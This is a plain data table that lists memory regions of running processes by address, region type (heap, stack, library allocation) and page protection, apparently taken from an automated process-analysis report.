|
trusted library allocation
|
page read and write
|
||
1DFB5D3E000
|
trusted library allocation
|
page read and write
|
||
7FFD9B970000
|
trusted library allocation
|
page read and write
|
||
7FFD9B77B000
|
trusted library allocation
|
page read and write
|
||
7FFD9BAB0000
|
trusted library allocation
|
page read and write
|
||
1DFCCC8A000
|
heap
|
page read and write
|
||
1DFB50CE000
|
trusted library allocation
|
page read and write
|
||
1EFC2E29000
|
trusted library allocation
|
page read and write
|
||
1F76B4D5000
|
heap
|
page read and write
|
||
7FFD9BB50000
|
trusted library allocation
|
page read and write
|
||
1310000
|
heap
|
page read and write
|
||
7FFD9B960000
|
trusted library allocation
|
page read and write
|
||
1F76D9D0000
|
heap
|
page read and write
|
||
1EFDA29D000
|
heap
|
page read and write
|
||
7FFD9B773000
|
trusted library allocation
|
page execute and read and write
|
||
17B4B030000
|
heap
|
page read and write
|
||
1F701E25000
|
trusted library allocation
|
page read and write
|
||
17B336F3000
|
trusted library allocation
|
page read and write
|
||
1B8E6000
|
heap
|
page read and write
|
||
7FFD9B921000
|
trusted library allocation
|
page read and write
|
||
7FFD9B762000
|
trusted library allocation
|
page read and write
|
||
1DFCC8F3000
|
heap
|
page read and write
|
||
1EFD2088000
|
trusted library allocation
|
page read and write
|
||
1DFB2905000
|
heap
|
page read and write
|
||
1EFD2082000
|
trusted library allocation
|
page read and write
|
||
125A1000
|
trusted library allocation
|
page read and write
|
||
1F76DA61000
|
heap
|
page read and write
|
||
800000
|
heap
|
page execute and read and write
|
||
7DF4AA7A0000
|
trusted library allocation
|
page execute and read and write
|
||
1F76D8F0000
|
heap
|
page read and write
|
||
1EFD1DB1000
|
trusted library allocation
|
page read and write
|
||
7FFD9B930000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
1DFB2B70000
|
heap
|
page read and write
|
||
12C9000
|
heap
|
page read and write
|
||
7FFD9BA80000
|
trusted library allocation
|
page read and write
|
||
1F76DA9C000
|
heap
|
page read and write
|
||
1EFC225D000
|
trusted library allocation
|
page read and write
|
||
1F76B470000
|
heap
|
page read and write
|
||
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB60000
|
trusted library allocation
|
page read and write
|
||
1DFB54D8000
|
trusted library allocation
|
page read and write
|
||
12E8000
|
heap
|
page read and write
|
||
1EFC3686000
|
trusted library allocation
|
page read and write
|
||
7FFD9B920000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B790000
|
trusted library allocation
|
page read and write
|
||
7FFD9B780000
|
trusted library allocation
|
page read and write
|
||
7FFD9B830000
|
trusted library allocation
|
page read and write
|
||
45EDB0E000
|
stack
|
page read and write
|
||
7FFD9B78D000
|
trusted library allocation
|
page execute and read and write
|
||
C66836000
|
stack
|
page read and write
|
||
7FFD9BBE0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BBA0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B770000
|
trusted library allocation
|
page read and write
|
||
7FFD9B7BC000
|
trusted library allocation
|
page execute and read and write
|
||
2B6514E000
|
stack
|
page read and write
|
||
7FFD9B76D000
|
trusted library allocation
|
page execute and read and write
|
||
D4E3C8F000
|
stack
|
page read and write
|
||
7FFD9B774000
|
trusted library allocation
|
page read and write
|
||
12F5000
|
heap
|
page read and write
|
||
7FFD9B784000
|
trusted library allocation
|
page read and write
|
||
7FFD9BAF0000
|
trusted library allocation
|
page read and write
|
||
1216000
|
heap
|
page read and write
|
||
17B4AEB1000
|
heap
|
page read and write
|
||
1DFCC8B2000
|
heap
|
page read and write
|
||
17B33A63000
|
trusted library allocation
|
page read and write
|
||
1BC8C000
|
stack
|
page read and write
|
||
1DFB5CC4000
|
trusted library allocation
|
page read and write
|
||
7FFD9BBB0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B856000
|
trusted library allocation
|
page execute and read and write
|
||
17B33A6C000
|
trusted library allocation
|
page read and write
|
||
7FFD9B902000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB7C000
|
trusted library allocation
|
page read and write
|
||
1B931000
|
heap
|
page read and write
|
||
14D0000
|
trusted library allocation
|
page read and write
|
||
17B4AE63000
|
heap
|
page read and write
|
||
1DFB524D000
|
trusted library allocation
|
page read and write
|
||
895000
|
heap
|
page read and write
|
||
D7C000
|
heap
|
page read and write
|
||
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
125A3000
|
trusted library allocation
|
page read and write
|
||
1F76B745000
|
heap
|
page read and write
|
||
1B890000
|
heap
|
page read and write
|
||
1EFDA2E8000
|
heap
|
page read and write
|
||
12E83000
|
trusted library allocation
|
page read and write
|
||
17B348CD000
|
trusted library allocation
|
page read and write
|
||
1DFB4F23000
|
trusted library allocation
|
page read and write
|
||
7FFD9B77D000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B810000
|
trusted library allocation
|
page read and write
|
||
1DFB28DE000
|
heap
|
page read and write
|
||
7FFD9BAD0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
1210000
|
heap
|
page read and write
|
||
2CEE000
|
trusted library allocation
|
page read and write
|
||
1B17D000
|
stack
|
page read and write
|
||
7FFD9BBA0000
|
trusted library allocation
|
page read and write
|
||
1EFC3157000
|
trusted library allocation
|
page read and write
|
||
7FFD9BBBB000
|
trusted library allocation
|
page read and write
|
||
17B33BB3000
|
trusted library allocation
|
page read and write
|
||
1DFCC86A000
|
heap
|
page read and write
|
||
17B4AE30000
|
heap
|
page read and write
|
||
1EFC0308000
|
heap
|
page read and write
|
||
1BC9E000
|
stack
|
page read and write
|
||
1DFCC867000
|
heap
|
page read and write
|
||
D4E2CF9000
|
stack
|
page read and write
|
||
7FFD9BB70000
|
trusted library allocation
|
page read and write
|
||
1B8BB000
|
heap
|
page read and write
|
||
1DFB27F0000
|
heap
|
page read and write
|
||
7FFD9B78B000
|
trusted library allocation
|
page read and write
|
||
1C624000
|
heap
|
page read and write
|
||
7FFD9B83C000
|
trusted library allocation
|
page execute and read and write
|
||
6DA000
|
heap
|
page read and write
|
||
1F7102EB000
|
trusted library allocation
|
page read and write
|
||
1DFB577C000
|
trusted library allocation
|
page read and write
|
||
1EFC1D80000
|
heap
|
page execute and read and write
|
||
7FFD9B920000
|
trusted library allocation
|
page read and write
|
||
1CD6E000
|
stack
|
page read and write
|
||
1F710309000
|
trusted library allocation
|
page read and write
|
||
17B42DE0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BBE0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B970000
|
trusted library allocation
|
page read and write
|
||
1F710031000
|
trusted library allocation
|
page read and write
|
||
7D0000
|
trusted library allocation
|
page read and write
|
||
6D0000
|
heap
|
page read and write
|
||
1F701954000
|
trusted library allocation
|
page read and write
|
||
D4E31BE000
|
stack
|
page read and write
|
||
1CAF0000
|
heap
|
page read and write
|
||
7FFD9BAA0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B7CC000
|
trusted library allocation
|
page execute and read and write
|
||
1DFC47D8000
|
trusted library allocation
|
page read and write
|
||
17B4B111000
|
heap
|
page read and write
|
||
7FFD9B7A0000
|
trusted library allocation
|
page read and write
|
||
1DFB27C0000
|
heap
|
page read and write
|
||
7FFD9BAD0000
|
trusted library allocation
|
page read and write
|
||
45ED0BE000
|
stack
|
page read and write
|
||
2B646FE000
|
stack
|
page read and write
|
||
7DF4AA790000
|
trusted library allocation
|
page execute and read and write
|
||
17B34319000
|
trusted library allocation
|
page read and write
|
||
1EFC1FB9000
|
trusted library allocation
|
page read and write
|
||
2BD0000
|
heap
|
page execute and read and write
|
||
1F70133F000
|
trusted library allocation
|
page read and write
|
||
17B33E30000
|
trusted library allocation
|
page read and write
|
||
2B6534C000
|
stack
|
page read and write
|
||
1F76B720000
|
heap
|
page readonly
|
||
7FFD9BA80000
|
trusted library allocation
|
page read and write
|
||
12F3000
|
heap
|
page read and write
|
||
17B32AE0000
|
heap
|
page execute and read and write
|
||
1EFC02C8000
|
heap
|
page read and write
|
||
1EFDA5EB000
|
heap
|
page read and write
|
||
1F700FA1000
|
trusted library allocation
|
page read and write
|
||
1DFB5D64000
|
trusted library allocation
|
page read and write
|
||
1EFDA250000
|
heap
|
page read and write
|
||
D4E2DF9000
|
stack
|
page read and write
|
||
7FFD9BBC0000
|
trusted library allocation
|
page read and write
|
||
1B770000
|
heap
|
page read and write
|
||
7FFD9B91A000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
45EC9FE000
|
stack
|
page read and write
|
||
1EFC3623000
|
trusted library allocation
|
page read and write
|
||
8F4000
|
unkown
|
page readonly
|
||
7FFD9B820000
|
trusted library allocation
|
page read and write
|
||
7FFD9BAA0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B948000
|
trusted library allocation
|
page read and write
|
||
1F76D949000
|
heap
|
page read and write
|
||
45ED03C000
|
stack
|
page read and write
|
||
7FFD9B952000
|
trusted library allocation
|
page read and write
|
||
17B4B1AD000
|
heap
|
page read and write
|
||
1DFB55F7000
|
trusted library allocation
|
page read and write
|
||
1BABF000
|
stack
|
page read and write
|
||
1DFCCB12000
|
heap
|
page read and write
|
||
17B33C17000
|
trusted library allocation
|
page read and write
|
||
1F76D6D0000
|
heap
|
page read and write
|
||
D50000
|
trusted library allocation
|
page read and write
|
||
1DFB62B2000
|
trusted library allocation
|
page read and write
|
||
17B32950000
|
heap
|
page read and write
|
||
1CAEA000
|
stack
|
page read and write
|
||
17B32AF1000
|
trusted library allocation
|
page read and write
|
||
1DFCC825000
|
heap
|
page read and write
|
||
7FFD9B880000
|
trusted library allocation
|
page execute and read and write
|
||
1EFC2F70000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB80000
|
trusted library allocation
|
page read and write
|
||
45ECEB9000
|
stack
|
page read and write
|
||
1DFCCBBC000
|
heap
|
page read and write
|
||
7FFD9B764000
|
trusted library allocation
|
page read and write
|
||
2C86000
|
trusted library allocation
|
page read and write
|
||
17B33877000
|
trusted library allocation
|
page read and write
|
||
17B42B01000
|
trusted library allocation
|
page read and write
|
||
1B9B0000
|
heap
|
page read and write
|
||
1DFB5504000
|
trusted library allocation
|
page read and write
|
||
620000
|
heap
|
page read and write
|
||
1EFC1BB0000
|
trusted library allocation
|
page read and write
|
||
1BB90000
|
heap
|
page execute and read and write
|
||
1F70186C000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA90000
|
trusted library allocation
|
page read and write
|
||
17B30D82000
|
heap
|
page read and write
|
||
10F4000
|
stack
|
page read and write
|
||
1F76D085000
|
heap
|
page read and write
|
||
1EFC1D60000
|
trusted library allocation
|
page read and write
|
||
1DFB28BE000
|
heap
|
page read and write
|
||
7FFD9BB00000
|
trusted library allocation
|
page read and write
|
||
1DFCCAA0000
|
trusted library allocation
|
page read and write
|
||
17B33DFC000
|
trusted library allocation
|
page read and write
|
||
45EDD0D000
|
stack
|
page read and write
|
||
17B4AF50000
|
heap
|
page read and write
|
||
7FFD9B950000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9BA7F000
|
trusted library allocation
|
page read and write
|
||
7FFD9B890000
|
trusted library allocation
|
page execute and read and write
|
||
1EFC1BC0000
|
heap
|
page readonly
|
||
1F76B730000
|
trusted library allocation
|
page read and write
|
||
2B641F9000
|
stack
|
page read and write
|
||
7FFD9B773000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9BBE0000
|
trusted library allocation
|
page read and write
|
||
2C71000
|
trusted library allocation
|
page read and write
|
||
1DFC4540000
|
trusted library allocation
|
page read and write
|
||
1DFB5C58000
|
trusted library allocation
|
page read and write
|
||
C667BE000
|
stack
|
page read and write
|
||
7FFD9BBF0000
|
trusted library allocation
|
page read and write
|
||
1DFCCC36000
|
heap
|
page read and write
|
||
1EFC1CA5000
|
heap
|
page read and write
|
||
7FFD9B774000
|
trusted library allocation
|
page read and write
|
||
7FFD9B940000
|
trusted library allocation
|
page execute and read and write
|
||
1DFB5594000
|
trusted library allocation
|
page read and write
|
||
1B50F000
|
stack
|
page read and write
|
||
7FFD9B774000
|
trusted library allocation
|
page read and write
|
||
1EFC1CA0000
|
heap
|
page read and write
|
||
1F7010C3000
|
trusted library allocation
|
page read and write
|
||
1F76D908000
|
heap
|
page read and write
|
||
17B32A80000
|
heap
|
page execute and read and write
|
||
17B30D65000
|
heap
|
page read and write
|
||
DE3000
|
heap
|
page read and write
|
||
1B88E000
|
stack
|
page read and write
|
||
17B30D9E000
|
heap
|
page read and write
|
||
1EFC2EB8000
|
trusted library allocation
|
page read and write
|
||
17B33A5F000
|
trusted library allocation
|
page read and write
|
||
17B4AEA9000
|
heap
|
page read and write
|
||
17B30CF0000
|
heap
|
page read and write
|
||
1DFB589A000
|
trusted library allocation
|
page read and write
|
||
7FFD9B826000
|
trusted library allocation
|
page read and write
|
||
7FFD9BBB0000
|
trusted library allocation
|
page read and write
|
||
17B32845000
|
heap
|
page read and write
|
||
2B64476000
|
stack
|
page read and write
|
||
1EFC0280000
|
heap
|
page read and write
|
||
1CF6C000
|
stack
|
page read and write
|
||
45EDD8B000
|
stack
|
page read and write
|
||
7FFD9BB53000
|
trusted library allocation
|
page read and write
|
||
17B42AF1000
|
trusted library allocation
|
page read and write
|
||
45EDC8C000
|
stack
|
page read and write
|
||
1EFDA4C0000
|
heap
|
page read and write
|
||
1C4DD000
|
stack
|
page read and write
|
||
C6758C000
|
stack
|
page read and write
|
||
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB10000
|
trusted library allocation
|
page read and write
|
||
1C5DE000
|
stack
|
page read and write
|
||
1F701DE0000
|
trusted library allocation
|
page read and write
|
||
850000
|
heap
|
page read and write
|
||
1AF5E000
|
stack
|
page read and write
|
||
1F710072000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
1DFB2880000
|
heap
|
page read and write
|
||
17B42DEA000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
C6750E000
|
stack
|
page read and write
|
||
2C8D000
|
trusted library allocation
|
page read and write
|
||
1B5BD000
|
stack
|
page read and write
|
||
1F700001000
|
trusted library allocation
|
page read and write
|
||
1DFCC810000
|
heap
|
page read and write
|
||
17B33D9A000
|
trusted library allocation
|
page read and write
|
||
17B42B62000
|
trusted library allocation
|
page read and write
|
||
17B4B19C000
|
heap
|
page read and write
|
||
1EFDA5CE000
|
heap
|
page read and write
|
||
7FFD9BA90000
|
trusted library allocation
|
page read and write
|
||
7DF46A5E0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B782000
|
trusted library allocation
|
page read and write
|
||
17B34440000
|
trusted library allocation
|
page read and write
|
||
1DFCC907000
|
heap
|
page read and write
|
||
1EFC2D0C000
|
trusted library allocation
|
page read and write
|
||
7FFD9B790000
|
trusted library allocation
|
page read and write
|
||
7FFD9B774000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
7DF425DB0000
|
trusted library allocation
|
page execute and read and write
|
||
1DFCCC58000
|
heap
|
page read and write
|
||
C66153000
|
stack
|
page read and write
|
||
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
17B30E2F000
|
heap
|
page read and write
|
||
17B42DDB000
|
trusted library allocation
|
page read and write
|
||
C6778E000
|
stack
|
page read and write
|
||
1F76B4D7000
|
heap
|
page read and write
|
||
1EFC0287000
|
heap
|
page read and write
|
||
25AC000
|
trusted library allocation
|
page read and write
|
||
1DFB51DC000
|
trusted library allocation
|
page read and write
|
||
708000
|
heap
|
page read and write
|
||
1DFB5104000
|
trusted library allocation
|
page read and write
|
||
7FFD9BADC000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
7FFD9BAB0000
|
trusted library allocation
|
page read and write
|
||
1DFC4714000
|
trusted library allocation
|
page read and write
|
||
2B6437E000
|
stack
|
page read and write
|
||
7DF4C58C0000
|
trusted library allocation
|
page execute and read and write
|
||
1EFDA55F000
|
heap
|
page read and write
|
||
1EFC3B96000
|
trusted library allocation
|
page read and write
|
||
1AA1D000
|
stack
|
page read and write
|
||
2C60000
|
trusted library allocation
|
page read and write
|
||
1F76D010000
|
heap
|
page read and write
|
||
9E0000
|
heap
|
page read and write
|
||
7FFD9BBD6000
|
trusted library allocation
|
page read and write
|
||
1EFDA508000
|
heap
|
page read and write
|
||
855000
|
heap
|
page read and write
|
||
7FFD9BB70000
|
trusted library allocation
|
page read and write
|
||
1F76D5A6000
|
heap
|
page execute and read and write
|
||
1DFB2AB0000
|
heap
|
page execute and read and write
|
||
7FFD9BAB9000
|
trusted library allocation
|
page read and write
|
||
17B4B163000
|
heap
|
page read and write
|
||
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
1F76D919000
|
heap
|
page read and write
|
||
D9A000
|
heap
|
page read and write
|
||
7FFD9B866000
|
trusted library allocation
|
page execute and read and write
|
||
1DFB2850000
|
trusted library section
|
page read and write
|
||
6C8000
|
heap
|
page read and write
|
||
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
45ECAF9000
|
stack
|
page read and write
|
||
17B348F2000
|
trusted library allocation
|
page read and write
|
||
1470000
|
heap
|
page read and write
|
||
1F76B660000
|
heap
|
page read and write
|
||
6A9000
|
heap
|
page read and write
|
||
7FFD9B816000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB90000
|
trusted library allocation
|
page read and write
|
||
17B33CCC000
|
trusted library allocation
|
page read and write
|
||
C668B9000
|
stack
|
page read and write
|
||
1F701031000
|
trusted library allocation
|
page read and write
|
||
7FFD9B81C000
|
trusted library allocation
|
page execute and read and write
|
||
1EFC298D000
|
trusted library allocation
|
page read and write
|
||
17B32770000
|
trusted library allocation
|
page read and write
|
||
1F7012AA000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B770000
|
trusted library allocation
|
page read and write
|
||
142F000
|
stack
|
page read and write
|
||
2C80000
|
trusted library allocation
|
page read and write
|
||
7FFD9B774000
|
trusted library allocation
|
page read and write
|
||
1239000
|
heap
|
page read and write
|
||
1EFC2CF7000
|
trusted library allocation
|
page read and write
|
||
1BFCB000
|
stack
|
page read and write
|
||
D4E2C7E000
|
stack
|
page read and write
|
||
1EFC1BD0000
|
trusted library allocation
|
page read and write
|
||
2C3E000
|
trusted library allocation
|
page read and write
|
||
2CB4000
|
trusted library allocation
|
page read and write
|
||
17B4B1B0000
|
heap
|
page read and write
|
||
7FFD9BBC6000
|
trusted library allocation
|
page read and write
|
||
99E000
|
stack
|
page read and write
|
||
7FFD9B780000
|
trusted library allocation
|
page read and write
|
||
7FFD9B944000
|
trusted library allocation
|
page read and write
|
||
7FFD9B954000
|
trusted library allocation
|
page read and write
|
||
7FFD9B763000
|
trusted library allocation
|
page execute and read and write
|
||
2E81000
|
trusted library allocation
|
page read and write
|
||
7FFD9BAD0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA80000
|
trusted library allocation
|
page read and write
|
||
2B652C9000
|
stack
|
page read and write
|
||
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
1F76B740000
|
heap
|
page read and write
|
||
1F70182D000
|
trusted library allocation
|
page read and write
|
||
1B5C0000
|
heap
|
page read and write
|
||
7FFD9B921000
|
trusted library allocation
|
page read and write
|
||
17B4B064000
|
heap
|
page read and write
|
||
45ECB7F000
|
stack
|
page read and write
|
||
1F701C1F000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB62000
|
trusted library allocation
|
page read and write
|
||
7FFD9BAF0000
|
trusted library allocation
|
page read and write
|
||
D4E3E07000
|
stack
|
page read and write
|
||
7FFD9BAEC000
|
trusted library allocation
|
page read and write
|
||
7FFD9BBB0000
|
trusted library allocation
|
page read and write
|
||
17B4B0F3000
|
heap
|
page read and write
|
||
1F76DA4E000
|
heap
|
page read and write
|
||
7FFD9BBDD000
|
trusted library allocation
|
page read and write
|
||
1DFB4556000
|
trusted library allocation
|
page read and write
|
||
127A000
|
heap
|
page read and write
|
||
1575000
|
heap
|
page read and write
|
||
17B4AE70000
|
heap
|
page read and write
|
||
7FFD9BBD0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B783000
|
trusted library allocation
|
page read and write
|
||
1EFC1CB0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BAD8000
|
trusted library allocation
|
page read and write
|
||
2BE1000
|
trusted library allocation
|
page read and write
|
||
7FFD9BBC0000
|
trusted library allocation
|
page read and write
|
||
1B6CE000
|
stack
|
page read and write
|
||
7FFD9BA10000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B780000
|
trusted library allocation
|
page read and write
|
||
7FFD9B7CC000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9BAB4000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB90000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9BAE0000
|
trusted library allocation
|
page read and write
|
||
1B780000
|
heap
|
page execute and read and write
|
||
7FFD9B760000
|
trusted library allocation
|
page read and write
|
||
1F7013C9000
|
trusted library allocation
|
page read and write
|
||
1F700D7A000
|
trusted library allocation
|
page read and write
|
||
17B4B0B1000
|
heap
|
page read and write
|
||
7FFD9B780000
|
trusted library allocation
|
page read and write
|
||
DDC000
|
heap
|
page read and write
|
||
1F76D030000
|
heap
|
page execute and read and write
|
||
7FFD9BBC0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
D4E323E000
|
stack
|
page read and write
|
||
2B642F7000
|
stack
|
page read and write
|
||
7FFD9B772000
|
trusted library allocation
|
page read and write
|
||
14F0000
|
heap
|
page execute and read and write
|
||
17B32B6C000
|
trusted library allocation
|
page read and write
|
||
1EFDA253000
|
heap
|
page read and write
|
||
7FFD9B763000
|
trusted library allocation
|
page execute and read and write
|
||
17B4AE34000
|
heap
|
page read and write
|
||
17B30D20000
|
heap
|
page read and write
|
||
17B4AE7F000
|
heap
|
page read and write
|
||
17B33B26000
|
trusted library allocation
|
page read and write
|
||
7FFD9B764000
|
trusted library allocation
|
page read and write
|
||
1EFD9D9E000
|
heap
|
page read and write
|
||
17B32830000
|
heap
|
page read and write
|
||
23C0000
|
heap
|
page read and write
|
||
2B9E000
|
stack
|
page read and write
|
||
C66B3B000
|
stack
|
page read and write
|
||
17B30FA0000
|
heap
|
page readonly
|
||
7FFD9BAE0000
|
trusted library allocation
|
page read and write
|
||
17B32955000
|
heap
|
page read and write
|
||
1EFC0160000
|
heap
|
page read and write
|
||
C6760E000
|
stack
|
page read and write
|
||
2C45000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA10000
|
trusted library allocation
|
page read and write
|
||
6DC000
|
heap
|
page read and write
|
||
45EDB8E000
|
stack
|
page read and write
|
||
7FFD9B820000
|
trusted library allocation
|
page read and write
|
||
7FFD9B76D000
|
trusted library allocation
|
page execute and read and write
|
||
1F700F73000
|
trusted library allocation
|
page read and write
|
||
1EFC1E17000
|
trusted library allocation
|
page read and write
|
||
17B33B87000
|
trusted library allocation
|
page read and write
|
||
D76000
|
heap
|
page read and write
|
||
1F70007B000
|
trusted library allocation
|
page read and write
|
||
D4E32BB000
|
stack
|
page read and write
|
||
1DFC47C8000
|
trusted library allocation
|
page read and write
|
||
1DFB2A90000
|
heap
|
page execute and read and write
|
||
1EFC1C30000
|
heap
|
page read and write
|
||
10D0000
|
heap
|
page read and write
|
||
1DFB2B40000
|
heap
|
page read and write
|
||
1DFB28C8000
|
heap
|
page read and write
|
||
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
12F0000
|
heap
|
page read and write
|
||
1AE5F000
|
stack
|
page read and write
|
||
7FFD9B931000
|
trusted library allocation
|
page read and write
|
||
45ECF3E000
|
stack
|
page read and write
|
||
1F76D63F000
|
heap
|
page read and write
|
||
1DFB2AF0000
|
trusted library allocation
|
page read and write
|
||
233E000
|
stack
|
page read and write
|
||
1C9E8000
|
stack
|
page read and write
|
||
1F76D955000
|
heap
|
page read and write
|
||
1EFDA247000
|
heap
|
page execute and read and write
|
||
7DF425DC0000
|
trusted library allocation
|
page execute and read and write
|
||
1DFB2AC0000
|
trusted library allocation
|
page read and write
|
||
1DFC47C0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B856000
|
trusted library allocation
|
page execute and read and write
|
||
1EFC02BD000
|
heap
|
page read and write
|
||
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
1465000
|
heap
|
page read and write
|
||
7FFD9BAE2000
|
trusted library allocation
|
page read and write
|
||
7FFD9BAD8000
|
trusted library allocation
|
page read and write
|
||
17B4B3F0000
|
heap
|
page read and write
|
||
1F76B680000
|
heap
|
page read and write
|
||
12E0000
|
heap
|
page read and write
|
||
1DFCCAE4000
|
heap
|
page read and write
|
||
C67689000
|
stack
|
page read and write
|
||
1DFCCB38000
|
heap
|
page read and write
|
||
1F76D5B0000
|
heap
|
page read and write
|
||
1F76D070000
|
trusted library allocation
|
page read and write
|
||
1EFD1E02000
|
trusted library allocation
|
page read and write
|
||
17B42DE2000
|
trusted library allocation
|
page read and write
|
||
7FFD9B78B000
|
trusted library allocation
|
page read and write
|
||
7FFD9B771000
|
trusted library allocation
|
page read and write
|
||
7FFD9B79B000
|
trusted library allocation
|
page read and write
|
||
1F76D97B000
|
heap
|
page read and write
|
||
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
17B33A67000
|
trusted library allocation
|
page read and write
|
||
7FFD9B912000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB00000
|
trusted library allocation
|
page read and write
|
||
D4E3138000
|
stack
|
page read and write
|
||
C66ABE000
|
stack
|
page read and write
|
||
45EC873000
|
stack
|
page read and write
|
||
7FFD9B960000
|
trusted library allocation
|
page execute and read and write
|
||
1B8F3000
|
heap
|
page read and write
|
||
1DFB28CC000
|
heap
|
page read and write
|
||
1DFB2870000
|
trusted library allocation
|
page read and write
|
||
45ED13B000
|
stack
|
page read and write
|
||
1DFB2A80000
|
trusted library allocation
|
page read and write
|
||
1B40D000
|
stack
|
page read and write
|
||
1EFC2D03000
|
trusted library allocation
|
page read and write
|
||
7FFD9BBC0000
|
trusted library allocation
|
page read and write
|
||
1DFB2830000
|
heap
|
page read and write
|
||
17B327A0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BBE0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B856000
|
trusted library allocation
|
page execute and read and write
|
||
1DFB56E6000
|
trusted library allocation
|
page read and write
|
||
1DFB2A60000
|
trusted library allocation
|
page read and write
|
||
1DFB62D7000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BAB3000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
1EFDA3E0000
|
heap
|
page read and write
|
||
7FFD9B770000
|
trusted library allocation
|
page read and write
|
||
7FFD9BAF0000
|
trusted library allocation
|
page read and write
|
||
1F7102EF000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
1DFB2B75000
|
heap
|
page read and write
|
||
17B34912000
|
trusted library allocation
|
page read and write
|
||
7FF4B9460000
|
trusted library allocation
|
page execute and read and write
|
||
2D00000
|
trusted library allocation
|
page read and write
|
||
1B05E000
|
stack
|
page read and write
|
||
1F76D900000
|
heap
|
page read and write
|
||
1EFC2FA9000
|
trusted library allocation
|
page read and write
|
||
7FFD9BBA0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B7CC000
|
trusted library allocation
|
page execute and read and write
|
||
1F710346000
|
trusted library allocation
|
page read and write
|
||
D70000
|
heap
|
page read and write
|
||
1BA8E000
|
stack
|
page read and write
|
||
2C97000
|
trusted library allocation
|
page read and write
|
||
17B30D40000
|
heap
|
page read and write
|
||
1EFDA4F9000
|
heap
|
page read and write
|
||
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA10000
|
trusted library allocation
|
page read and write
|
||
1DFB499F000
|
trusted library allocation
|
page read and write
|
||
7FFD9BAC9000
|
trusted library allocation
|
page read and write
|
||
7FFD9BAA3000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
17B34358000
|
trusted library allocation
|
page read and write
|
||
17B34273000
|
trusted library allocation
|
page read and write
|
||
1DFCCAE0000
|
heap
|
page read and write
|
||
1DFB62F7000
|
trusted library allocation
|
page read and write
|
||
1EFC02C4000
|
heap
|
page read and write
|
||
D80000
|
unkown
|
page readonly
|
||
1F76DA2D000
|
heap
|
page read and write
|
||
1DFB290B000
|
heap
|
page read and write
|
||
7FFD9B76D000
|
trusted library allocation
|
page execute and read and write
|
||
1EFDA5AA000
|
heap
|
page read and write
|
||
706000
|
heap
|
page read and write
|
||
10F5000
|
heap
|
page read and write
|
||
7FFD9B920000
|
trusted library allocation
|
page execute and read and write
|
||
17B4B154000
|
heap
|
page read and write
|
||
2CFC000
|
trusted library allocation
|
page read and write
|
||
1DFB50D0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B77D000
|
trusted library allocation
|
page execute and read and write
|
||
45ECBFB000
|
stack
|
page read and write
|
||
1EFDA520000
|
heap
|
page read and write
|
||
